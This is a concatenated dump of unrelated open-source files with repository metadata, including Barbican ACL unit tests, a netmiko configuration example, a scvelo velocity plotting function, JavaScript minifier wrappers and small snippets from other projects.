cmd_args.default_dns= default_dns
cmd_args.next_sub_file = next_sub_dict
cmd_args.other_file = other_file
cmd_args.cname='y'
brute = Brutedomain(cmd_args)
brute.run()
return brute.found_count
|
data/micro-benchmark/lists/simple/main.py | vitsalis/pycg-evaluation | 121 | 11179106 | def func1():
pass
def func2():
pass
def func3():
pass
a = [func1, func2, func3]
a[0]()
a[1]()
a[2]()
def func4():
pass
b = [None]
b[0] = func4
b[0]()
|
barbican/tests/model/repositories/test_repositories_acls.py | mail2nsrajesh/barbican | 177 | 11179122 | <reponame>mail2nsrajesh/barbican
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from barbican.common import exception
from barbican.model import models
from barbican.model import repositories
from barbican.tests import database_utils
class TestACLMixin(object):
def _assert_acl_users(self, user_ids, acls, acl_id, check_size=True):
"""Checks that all input users are present in matching acl users data.
It also checks if number of acl users are same as input users when
check_size flag is True.
"""
acls_map = self._map_id_to_acl(acls)
acl_users = acls_map[acl_id].to_dict_fields()['users']
if check_size:
self.assertEqual(len(user_ids), len(acl_users))
self.assertTrue(all(user_id in user_ids for user_id in acl_users))
def _map_id_to_acl(self, acls):
"""Provides dictionary of id and acl from acls list."""
m = {}
for acl in acls:
m[acl.id] = acl
return m
class WhenTestingSecretACLRepository(database_utils.RepositoryTestCase,
TestACLMixin):
def setUp(self):
super(WhenTestingSecretACLRepository, self).setUp()
self.acl_repo = repositories.get_secret_acl_repository()
def _create_base_secret(self, project_id=None):
# Setup the secret and needed base relationship
secret_repo = repositories.get_secret_repository()
session = secret_repo.get_session()
if project_id is None: # don't re-create project if it created earlier
project = models.Project()
project.external_id = "keystone_project_id"
project.save(session=session)
project_id = project.id
secret_model = models.Secret()
secret_model.project_id = project_id
secret = secret_repo.create_from(secret_model, session=session)
secret.save(session=session)
session.commit()
return secret
def test_get_by_secret_id(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(0, len(acls))
acl1 = self.acl_repo.create_from(models.SecretACL(secret.id, 'read',
True, ['u1', 'u2']),
session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(1, len(acls))
self.assertEqual(acl1.id, acls[0].id)
self.assertEqual('read', acls[0].operation)
self._assert_acl_users(['u2', 'u1'], acls, acl1.id)
def test_get_by_entity_id(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read', True, ['u1', 'u2']), session)
acl = self.acl_repo.get(acl1.id, session)
self.assertIsNotNone(acl)
self.assertEqual(acl1.id, acl.id)
self.assertEqual('read', acl.operation)
self._assert_acl_users(['u1', 'u2'], [acl], acl1.id)
self.acl_repo.delete_entity_by_id(acl1.id, session)
acl = self.acl_repo.get(acl1.id, session, suppress_exception=True)
self.assertIsNone(acl)
def test_should_raise_notfound_exception_get_by_entity_id(self):
self.assertRaises(exception.NotFound, self.acl_repo.get,
"invalid_id", suppress_exception=False)
def test_create_or_replace_from_for_new_acls(self):
"""Check create_or_replace_from and get count call.
It creates new acls with users and make sure that same users
are returned when acls are queries by secret id.
It uses get count to assert expected number of acls for that secret.
"""
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'write', False), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'delete'), session)
self.acl_repo.create_or_replace_from(
secret, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
self.assertTrue(id_map[acl1.id].project_access)
self.assertFalse(id_map[acl2.id].project_access)
self.assertEqual('read', id_map[acl1.id].operation)
self.assertEqual('write', id_map[acl2.id].operation)
self.assertEqual('delete', id_map[acl3.id].operation)
# order of input users should not matter
self._assert_acl_users(['u1', 'u2'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1', 'u3'], acls, acl2.id)
count = self.acl_repo.get_count(secret.id, session)
self.assertEqual(3, count)
self.assertEqual(count, len(acls))
def test_create_or_replace_from_with_none_or_blank_users(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=None, session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'list'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=[], session=session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
id_map = self._map_id_to_acl(acls)
self.assertIsNone(id_map[acl1.id].to_dict_fields().get('users'))
self.assertIsNone(id_map[acl2.id].to_dict_fields().get('users'))
def test_create_or_replace_from_for_existing_acls(self):
"""Check create_or_replace_from and get count call.
It modifies existing acls with users and make sure that updated users
and project_access flag changes are returned when acls are queries by
secret id. It uses get count to assert expected number of acls for that
secret.
"""
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'write'), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'list'), session)
self.acl_repo.create_or_replace_from(
secret, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_secret_id(secret.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
# replace users in existing acls
id_map[acl1.id].project_access = False
self.acl_repo.create_or_replace_from(
secret, id_map[acl1.id], user_ids=['u5'], session=session)
self.acl_repo.create_or_replace_from(
secret, id_map[acl2.id], user_ids=['u1', 'u2', 'u3', 'u4'],
session=session)
self.acl_repo.create_or_replace_from(
secret, id_map[acl3.id], user_ids=['u1', 'u2', 'u4'],
session=session)
session.commit() # commit the changes made so far
acls = self.acl_repo.get_by_secret_id(secret.id, session)
id_map = self._map_id_to_acl(acls)
self.assertEqual(3, len(acls))
self.assertFalse(id_map[acl1.id].project_access)
self.assertTrue(id_map[acl2.id].project_access)
self.assertTrue(id_map[acl3.id].project_access)
self._assert_acl_users(['u5'], acls, acl1.id)
self._assert_acl_users(['u1', 'u2', 'u3', 'u4'], acls, acl2.id)
self._assert_acl_users(['u1', 'u2', 'u4'], acls, acl3.id)
def test_get_count(self):
session = self.acl_repo.get_session()
secret1 = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(secret1.id, 'read',
None, ['u1', 'u2']),
session)
self.acl_repo.create_or_replace_from(secret1, acl1)
secret2 = self._create_base_secret(secret1.project.id)
acl21 = self.acl_repo.create_from(models.SecretACL(secret2.id, 'read',
None, ['u3', 'u4']),
session)
self.acl_repo.create_or_replace_from(secret2, acl21)
acl22 = self.acl_repo.create_from(models.SecretACL(secret2.id, 'write',
None, ['u5', 'u6']),
session)
self.acl_repo.create_or_replace_from(secret2, acl22)
self.assertEqual(1, self.acl_repo.get_count(secret1.id))
self.assertEqual(2, self.acl_repo.get_count(secret2.id))
def test_delete_single_acl_and_count(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(secret.id, 'read',
None, ['u1', 'u2']),
session)
self.acl_repo.create_or_replace_from(secret, acl1)
acl2 = self.acl_repo.create_from(
models.SecretACL(secret.id, 'write'), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'])
acl3 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'list'), session)
self.acl_repo.create_or_replace_from(secret, acl3,
user_ids=['u1', 'u3'])
count = self.acl_repo.get_count(secret.id)
self.assertEqual(3, count)
self.acl_repo.delete_entity_by_id(acl2.id, None)
session.commit()
self.assertEqual(2, len(secret.secret_acls))
deleted_acl = self.acl_repo.get(acl2.id, suppress_exception=True)
self.assertIsNone(deleted_acl)
acls = self.acl_repo.get_by_secret_id(secret.id)
self.assertEqual(2, len(acls))
count = self.acl_repo.get_count(secret.id)
self.assertEqual(2, count)
def test_delete_acls_for_secret(self):
session = self.acl_repo.get_session()
secret = self._create_base_secret()
acl1 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'read'), session)
self.acl_repo.create_or_replace_from(
secret, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.SecretACL(
secret.id, 'write'), session)
self.acl_repo.create_or_replace_from(
secret, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
self.acl_repo.delete_acls_for_secret(secret)
acls = self.acl_repo.get_by_secret_id(secret.id)
self.assertEqual(0, len(acls))
class WhenTestingContainerACLRepository(database_utils.RepositoryTestCase,
TestACLMixin):
def setUp(self):
super(WhenTestingContainerACLRepository, self).setUp()
self.acl_repo = repositories.get_container_acl_repository()
def _create_base_container(self, project_id=None):
# Setup the container and needed base relationship
container_repo = repositories.get_container_repository()
session = container_repo.get_session()
if project_id is None:
project = models.Project()
project.external_id = "keystone_project_id"
project.save(session=session)
project_id = project.id
container = models.Container()
container.project_id = project_id
container.save(session=session)
session.commit()
return container
def test_get_by_container_id(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(0, len(acls))
acl1 = self.acl_repo.create_from(models.ContainerACL(container.id,
'read', True,
['u1', 'u2']),
session)
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(1, len(acls))
self.assertEqual(acl1.id, acls[0].id)
self.assertEqual('read', acls[0].operation)
self._assert_acl_users(['u1', 'u2'], acls, acl1.id)
def test_get_by_entity_id(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read', True, ['u1', 'u2']), session)
acl = self.acl_repo.get(acl1.id, session)
self.assertIsNotNone(acl)
self.assertEqual(acl1.id, acl.id)
self.assertEqual('read', acl.operation)
self._assert_acl_users(['u1', 'u2'], [acl], acl1.id)
self.acl_repo.delete_entity_by_id(acl1.id, session)
acl = self.acl_repo.get(acl1.id, session, suppress_exception=True)
self.assertIsNone(acl)
def test_should_raise_notfound_exception_get_by_entity_id(self):
self.assertRaises(exception.NotFound, self.acl_repo.get,
"invalid_id", suppress_exception=False)
def test_create_or_replace_from_for_new_acls(self):
"""Check create_or_replace_from and get count call.
It creates new acls with users and make sure that same users
are returned when acls are queries by secret id.
It uses get count to assert expected number of acls for that secret.
"""
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write', False), session)
self.acl_repo.create_or_replace_from(
container, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'list'), session)
self.acl_repo.create_or_replace_from(
container, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
self.assertTrue(id_map[acl1.id].project_access)
self.assertFalse(id_map[acl2.id].project_access)
self.assertEqual('read', id_map[acl1.id].operation)
self.assertEqual('write', id_map[acl2.id].operation)
self.assertEqual('list', id_map[acl3.id].operation)
# order of input users should not matter
self._assert_acl_users(['u1', 'u2'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1'], acls, acl1.id)
self._assert_acl_users(['u2', 'u1', 'u3'], acls, acl2.id)
count = self.acl_repo.get_count(container.id, session)
self.assertEqual(3, count)
self.assertEqual(count, len(acls))
def test_create_or_replace_from_with_none_or_blank_users(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=None, session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=[], session=session)
acls = self.acl_repo.get_by_container_id(container.id, session)
id_map = self._map_id_to_acl(acls)
self.assertIsNone(id_map[acl1.id].to_dict_fields().get('users'))
self.assertIsNone(id_map[acl2.id].to_dict_fields().get('users'))
def test_create_or_replace_from_for_existing_acls(self):
"""Check create_or_replace_from and get count call.
It modifies existing acls with users and make sure that updated users
and project_access flag changes are returned when acls are queries by
secret id. It uses get count to assert expected number of acls for that
secret.
"""
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(
container, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
acl3 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'list'), session)
self.acl_repo.create_or_replace_from(
container, acl3, user_ids=[], session=session)
acls = self.acl_repo.get_by_container_id(container.id, session)
self.assertEqual(3, len(acls))
id_map = self._map_id_to_acl(acls)
# replace users in existing acls
id_map[acl1.id].project_access = False
self.acl_repo.create_or_replace_from(
container, id_map[acl1.id], user_ids=['u5'], session=session)
self.acl_repo.create_or_replace_from(
container, id_map[acl2.id], user_ids=['u1', 'u2', 'u3', 'u4'],
session=session)
self.acl_repo.create_or_replace_from(
container, id_map[acl3.id], user_ids=['u1', 'u2', 'u4'],
session=session)
session.commit()
acls = self.acl_repo.get_by_container_id(container.id, session)
id_map = self._map_id_to_acl(acls)
self.assertEqual(3, len(acls))
self.assertFalse(id_map[acl1.id].project_access)
self.assertTrue(id_map[acl2.id].project_access)
self.assertTrue(id_map[acl3.id].project_access)
self._assert_acl_users(['u5'], acls, acl1.id)
self._assert_acl_users(['u1', 'u2', 'u3', 'u4'], acls, acl2.id)
self._assert_acl_users(['u1', 'u2', 'u4'], acls, acl3.id)
def test_get_count(self):
session = self.acl_repo.get_session()
container1 = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container1.id, 'read', None, ['u1', 'u2']), session)
self.acl_repo.create_or_replace_from(container1, acl1)
container2 = self._create_base_container(container1.project_id)
acl21 = self.acl_repo.create_from(models.ContainerACL(
container2.id, 'read', None, ['u3', 'u4']), session)
self.acl_repo.create_or_replace_from(container2, acl21)
acl22 = self.acl_repo.create_from(models.ContainerACL(
container2.id, 'write', None, ['u5', 'u6']), session)
self.acl_repo.create_or_replace_from(container2, acl22)
self.assertEqual(1, self.acl_repo.get_count(container1.id))
self.assertEqual(2, self.acl_repo.get_count(container2.id))
def test_delete_single_acl_and_count(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(container, acl1,
user_ids=['u1', 'u2'])
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(container, acl2,
user_ids=['u1', 'u2', 'u3'])
acl3 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'list'), session)
self.acl_repo.create_or_replace_from(container, acl3,
user_ids=['u1', 'u3'])
count = self.acl_repo.get_count(container.id)
self.assertEqual(3, count)
self.acl_repo.delete_entity_by_id(acl2.id, None)
session.commit() # commit the changes made so far
self.assertEqual(2, len(container.container_acls))
deleted_acl = self.acl_repo.get(acl2.id, suppress_exception=True)
self.assertIsNone(deleted_acl)
acls = self.acl_repo.get_by_container_id(container.id)
self.assertEqual(2, len(acls))
count = self.acl_repo.get_count(container.id)
self.assertEqual(2, count)
def test_delete_acls_for_secret(self):
session = self.acl_repo.get_session()
container = self._create_base_container()
acl1 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'read'), session)
self.acl_repo.create_or_replace_from(
container, acl1, user_ids=['u1', 'u2'], session=session)
acl2 = self.acl_repo.create_from(models.ContainerACL(
container.id, 'write'), session)
self.acl_repo.create_or_replace_from(
container, acl2, user_ids=['u1', 'u2', 'u3'], session=session)
self.acl_repo.delete_acls_for_container(container)
acls = self.acl_repo.get_by_container_id(container.id)
self.assertEqual(0, len(acls))
|
examples/config_change.py | josephwhite13/netmiko | 2,833 | 11179134 | #!/usr/bin/env python
from netmiko import ConnectHandler
from getpass import getpass
device = {
"device_type": "cisco_ios",
"host": "cisco1.lasthop.io",
"username": "pyclass",
"password": getpass(),
}
commands = ["logging buffered 100000"]
with ConnectHandler(**device) as net_connect:
output = net_connect.send_config_set(commands)
output += net_connect.save_config()
print()
print(output)
print()
|
cross-modal-search/flows/executors.py | nikosNalmpantis/examples | 434 | 11179136 | """ Implementation of filters for images and texts"""
import numpy as np
from jina import Executor, DocumentArray, requests
class ImageReader(Executor):
@requests(on='/index')
def index_read(self, docs: 'DocumentArray', **kwargs):
array = DocumentArray(list(filter(lambda doc: doc.modality=='image', docs)))
for doc in array:
doc.convert_image_buffer_to_blob()
doc.blob = np.array(doc.blob).astype(np.uint8)
return array
@requests(on='/search')
def search_read(self, docs: 'DocumentArray', **kwargs):
image_docs = DocumentArray(list(filter(lambda doc: doc.mime_type in ('image/jpeg', 'image/png'), docs)))
if not image_docs:
return DocumentArray([])
for doc in image_docs:
doc.convert_uri_to_buffer()
doc.convert_image_buffer_to_blob()
doc.blob = doc.blob.astype(np.uint8)
return image_docs
class TextFilter(Executor):
@requests
def filter_text(self, docs: 'DocumentArray', **kwargs):
docs = DocumentArray(list(filter(lambda doc: doc.mime_type == 'text/plain', docs)))
return docs
|
tests/test_tags_in_curlies_2.py | adamserafini/pyxl4 | 366 | 11179140 | # coding: pyxl
from pyxl import html
def test():
assert str(<frag>{'<img src="foo" />'}</frag>) == """<img src="foo" />"""
|
lib/python/lightningjs/compiler/__init__.py | hooplab/lightningjs | 193 | 11179154 | import os
import re
import sys
import tempfile
import subprocess
_CLOSURE_COMPRESSOR_PATH = os.path.join(os.path.dirname(__file__), 'closure-compiler.jar')
_YUI_COMPRESSOR_PATH = os.path.join(os.path.dirname(__file__), 'yuicompressor-2.4.2.jar')
def minify_with_closure(path):
pipe = subprocess.Popen([
'java',
'-jar',
_CLOSURE_COMPRESSOR_PATH,
# '--compilation_level',
# 'ADVANCED_OPTIMIZATIONS',
'--js',
path,
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response = pipe.communicate()
def only_warning_is_about_the_with_statement(output):
lines = output.split('\n')
num_warning_lines = len([True for line in lines if 'WARNING' in line])
num_with_warning_lines = len([True for line in lines if 'The use of the with structure should be avoided.' in line])
if num_with_warning_lines == num_warning_lines:
# all warnings were for the 'with' construct, ignore them
return True
else:
return False
if response[1] and not only_warning_is_about_the_with_statement(output=response[1]):
# TODO: render the closure errors more nicely?
error_list = [response[1]]
details = '\n'.join(error_list)
raise StandardError("failed to compile module '%(path)s':\n\n%(details)s\n\n" % locals())
return response[0]
def minify_with_yuicompressor(path, retain_variable_names=False):
# helper for displaying line-by-line YUI compressor errors
def _contextualize_yuicompressor_errors(path, yui_stderr_string):
# parse the YUI compressor errors line-by-line
reasons = [' '.join(x.split()[1:]) for x in yui_stderr_string.split('\n') if '[ERROR]' in x]
errors = []
with open(path) as source_fd:
lines = source_fd.readlines()
for reason in reasons:
line_number = int(reason.split(':')[0]) - 1
line_contents = lines[line_number].strip()
errors += ['%(reason)s =====> %(line_contents)s' % locals()]
return errors
command_pieces = [
'java',
'-jar',
_YUI_COMPRESSOR_PATH
]
if retain_variable_names:
command_pieces += ['--nomunge']
command_pieces += [
'--type',
'js',
path,
]
pipe = subprocess.Popen(command_pieces, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
response = pipe.communicate()
if response[1]:
error_list = _contextualize_yuicompressor_errors(path=module.path, yui_stderr_string=response[1])
details = '\n'.join(error_list)
raise StandardError("failed to compile module '%(path)s':\n\n%(details)s\n\n" % locals())
return response[0]
|
pydocx/openxml/wordprocessing/level.py | botzill/pydocx | 127 | 11179198 | <reponame>botzill/pydocx<gh_stars>100-1000
# coding: utf-8
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
from pydocx.models import XmlModel, XmlChild, XmlAttribute
from pydocx.openxml.wordprocessing.run_properties import RunProperties
from pydocx.openxml.wordprocessing.paragraph_properties import ParagraphProperties # noqa
class Level(XmlModel):
XML_TAG = 'lvl'
level_id = XmlAttribute(name='ilvl')
start = XmlChild(attrname='val')
num_format = XmlChild(name='numFmt', attrname='val')
restart = XmlChild(name='lvlRestart', attrname='val')
paragraph_style = XmlChild(name='pStyle', attrname='val')
run_properties = XmlChild(type=RunProperties)
paragraph_properties = XmlChild(type=ParagraphProperties)
def is_bullet_format(self):
return self.num_format == 'bullet'
def format_is_none(self):
if not self.num_format:
return True
return self.num_format.lower() == 'none'
|
scvelo/plotting/velocity.py | WeilerP/scvelo | 272 | 11179230 | <reponame>WeilerP/scvelo
import numpy as np
import pandas as pd
from scipy.sparse import issparse
import matplotlib.pyplot as pl
from matplotlib import rcParams
from scvelo.preprocessing.moments import second_order_moments
from scvelo.tools.rank_velocity_genes import rank_velocity_genes
from .scatter import scatter
from .utils import (
default_basis,
default_size,
get_basis,
get_figure_params,
savefig_or_show,
)
def velocity(
adata,
var_names=None,
basis=None,
vkey="velocity",
mode=None,
fits=None,
layers="all",
color=None,
color_map=None,
colorbar=True,
perc=[2, 98],
alpha=0.5,
size=None,
groupby=None,
groups=None,
legend_loc="none",
legend_fontsize=8,
use_raw=False,
fontsize=None,
figsize=None,
dpi=None,
show=None,
save=None,
ax=None,
ncols=None,
**kwargs,
):
"""Phase and velocity plot for set of genes.
The phase plot shows spliced against unspliced expressions with steady-state fit.
Further the embedding is shown colored by velocity and expression.
Arguments
---------
adata: :class:`~anndata.AnnData`
Annotated data matrix.
var_names: `str` or list of `str` (default: `None`)
Which variables to show.
basis: `str` (default: `'umap'`)
Key for embedding coordinates.
mode: `'stochastic'` or `None` (default: `None`)
Whether to show show covariability phase portrait.
fits: `str` or list of `str` (default: `['velocity', 'dynamics']`)
Which steady-state estimates to show.
layers: `str` or list of `str` (default: `'all'`)
Which layers to show.
color: `str`, list of `str` or `None` (default: `None`)
Key for annotations of observations/cells or variables/genes
color_map: `str` or tuple (default: `['RdYlGn', 'gnuplot_r']`)
String denoting matplotlib color map. If tuple is given, first and latter
color map correspond to velocity and expression, respectively.
perc: tuple, e.g. [2,98] (default: `[2,98]`)
Specify percentile for continuous coloring.
groups: `str`, `list` (default: `None`)
Subset of groups, e.g. [‘g1’, ‘g2’], to which the plot shall be restricted.
groupby: `str`, `list` or `np.ndarray` (default: `None`)
Key of observations grouping to consider.
legend_loc: str (default: 'none')
Location of legend, either 'on data', 'right margin'
or valid keywords for matplotlib.legend.
size: `float` (default: 5)
Point size.
alpha: `float` (default: 1)
Set blending - 0 transparent to 1 opaque.
fontsize: `float` (default: `None`)
Label font size.
figsize: tuple (default: `(7,5)`)
Figure size.
dpi: `int` (default: 80)
Figure dpi.
show: `bool`, optional (default: `None`)
Show the plot, do not return axis.
save: `bool` or `str`, optional (default: `None`)
If `True` or a `str`, save the figure. A string is appended to the default
filename. Infer the filetype if ending on {'.pdf', '.png', '.svg'}.
ax: `matplotlib.Axes`, optional (default: `None`)
A matplotlib axes object. Only works if plotting a single component.
ncols: `int` or `None` (default: `None`)
Number of columns to arange multiplots into.
"""
basis = default_basis(adata) if basis is None else get_basis(adata, basis)
color, color_map = kwargs.pop("c", color), kwargs.pop("cmap", color_map)
if fits is None:
fits = ["velocity", "dynamics"]
if color_map is None:
color_map = ["RdYlGn", "gnuplot_r"]
if isinstance(groupby, str) and groupby in adata.obs.keys():
if (
"rank_velocity_genes" not in adata.uns.keys()
or adata.uns["rank_velocity_genes"]["params"]["groupby"] != groupby
):
rank_velocity_genes(adata, vkey=vkey, n_genes=10, groupby=groupby)
names = np.array(adata.uns["rank_velocity_genes"]["names"].tolist())
if groups is None:
var_names = names[:, 0]
else:
groups = [groups] if isinstance(groups, str) else groups
categories = adata.obs[groupby].cat.categories
idx = np.array([any([g in group for g in groups]) for group in categories])
var_names = np.hstack(names[idx, : int(10 / idx.sum())])
elif var_names is not None:
if isinstance(var_names, str):
var_names = [var_names]
else:
var_names = [var for var in var_names if var in adata.var_names]
else:
raise ValueError("No var_names or groups specified.")
var_names = pd.unique(var_names)
if use_raw or "Ms" not in adata.layers.keys():
skey, ukey = "spliced", "unspliced"
else:
skey, ukey = "Ms", "Mu"
layers = [vkey, skey] if layers == "all" else layers
layers = [layer for layer in layers if layer in adata.layers.keys() or layer == "X"]
fits = list(adata.layers.keys()) if fits == "all" else fits
fits = [fit for fit in fits if f"{fit}_gamma" in adata.var.keys()] + ["dynamics"]
stochastic_fits = [fit for fit in fits if f"variance_{fit}" in adata.layers.keys()]
nplts = 1 + len(layers) + (mode == "stochastic") * 2
ncols = 1 if ncols is None else ncols
nrows = int(np.ceil(len(var_names) / ncols))
ncols = int(ncols * nplts)
figsize = rcParams["figure.figsize"] if figsize is None else figsize
figsize, dpi = get_figure_params(figsize, dpi, ncols / 2)
if ax is None:
gs_figsize = (figsize[0] * ncols / 2, figsize[1] * nrows / 2)
ax = pl.figure(figsize=gs_figsize, dpi=dpi)
gs = pl.GridSpec(nrows, ncols, wspace=0.5, hspace=0.8)
# half size, since fontsize is halved in width and height
size = default_size(adata) / 2 if size is None else size
fontsize = rcParams["font.size"] * 0.8 if fontsize is None else fontsize
scatter_kwargs = dict(colorbar=colorbar, perc=perc, size=size, use_raw=use_raw)
scatter_kwargs.update(dict(fontsize=fontsize, legend_fontsize=legend_fontsize))
for v, var in enumerate(var_names):
_adata = adata[:, var]
s, u = _adata.layers[skey], _adata.layers[ukey]
if issparse(s):
s, u = s.A, u.A
# spliced/unspliced phase portrait with steady-state estimate
ax = pl.subplot(gs[v * nplts])
cmap = color_map
if isinstance(color_map, (list, tuple)):
cmap = color_map[-1] if color in ["X", skey] else color_map[0]
if "xlabel" not in kwargs:
kwargs["xlabel"] = "spliced"
if "ylabel" not in kwargs:
kwargs["ylabel"] = "unspliced"
legend_loc_lines = "none" if v < len(var_names) - 1 else legend_loc
scatter(
adata,
basis=var,
color=color,
color_map=cmap,
frameon=True,
title=var,
alpha=alpha,
vkey=fits,
show=False,
ax=ax,
save=False,
legend_loc_lines=legend_loc_lines,
**scatter_kwargs,
**kwargs,
)
# velocity and expression plots
for layer_id, layer in enumerate(layers):
ax = pl.subplot(gs[v * nplts + layer_id + 1])
title = "expression" if layer in ["X", skey] else layer
# _kwargs = {} if title == 'expression' else kwargs
cmap = color_map
if isinstance(color_map, (list, tuple)):
cmap = color_map[-1] if layer in ["X", skey] else color_map[0]
scatter(
adata,
basis=basis,
color=var,
layer=layer,
title=title,
color_map=cmap,
alpha=alpha,
frameon=False,
show=False,
ax=ax,
save=False,
**scatter_kwargs,
**kwargs,
)
if mode == "stochastic":
ss, us = second_order_moments(_adata)
s, u, ss, us = s.flatten(), u.flatten(), ss.flatten(), us.flatten()
fit = stochastic_fits[0]
ax = pl.subplot(gs[v * nplts + len(layers) + 1])
beta, offset = 1, 0
if f"{fit}_beta" in adata.var.keys():
beta = _adata.var[f"{fit}_beta"]
if f"{fit}_offset" in adata.var.keys():
offset = _adata.var[f"{fit}_offset"]
x = np.array(2 * (ss - s ** 2) - s)
y = np.array(2 * (us - u * s) + u + 2 * s * offset / beta)
kwargs["xlabel"] = r"2 $\Sigma_s - \langle s \rangle$"
kwargs["ylabel"] = r"2 $\Sigma_{us} + \langle u \rangle$"
scatter(
adata,
x=x,
y=y,
color=color,
title=var,
frameon=True,
ax=ax,
save=False,
show=False,
**scatter_kwargs,
**kwargs,
)
xnew = np.linspace(np.min(x), np.max(x) * 1.02)
for fit in stochastic_fits:
gamma, beta, offset2 = 1, 1, 0
if f"{fit}_gamma" in adata.var.keys():
gamma = _adata.var[f"{fit}_gamma"].values
if f"{fit}_beta" in adata.var.keys():
beta = _adata.var[f"{fit}_beta"].values
if f"{fit}_offset2" in adata.var.keys():
offset2 = _adata.var[f"{fit}_offset2"].values
ynew = gamma / beta * xnew + offset2 / beta
pl.plot(xnew, ynew, c="k", linestyle="--")
savefig_or_show(dpi=dpi, save=save, show=show)
if show is False:
return ax
|
cosypose/training/pose_models_cfg.py | ompugao/cosypose | 202 | 11179241 | # Backbones
from cosypose.models.efficientnet import EfficientNet
from cosypose.models.wide_resnet import WideResNet18, WideResNet34
from cosypose.models.flownet import flownet_pretrained
# Pose models
from cosypose.models.pose import PosePredictor
from cosypose.utils.logging import get_logger
logger = get_logger(__name__)
def check_update_config(config):
if not hasattr(config, 'init_method'):
config.init_method = 'v0'
return config
def create_model_pose(cfg, renderer, mesh_db):
n_inputs = 6
backbone_str = cfg.backbone_str
if backbone_str == 'efficientnet-b3':
backbone = EfficientNet.from_name('efficientnet-b3', in_channels=n_inputs)
backbone.n_features = 1536
elif backbone_str == 'flownet':
backbone = flownet_pretrained(n_inputs=n_inputs)
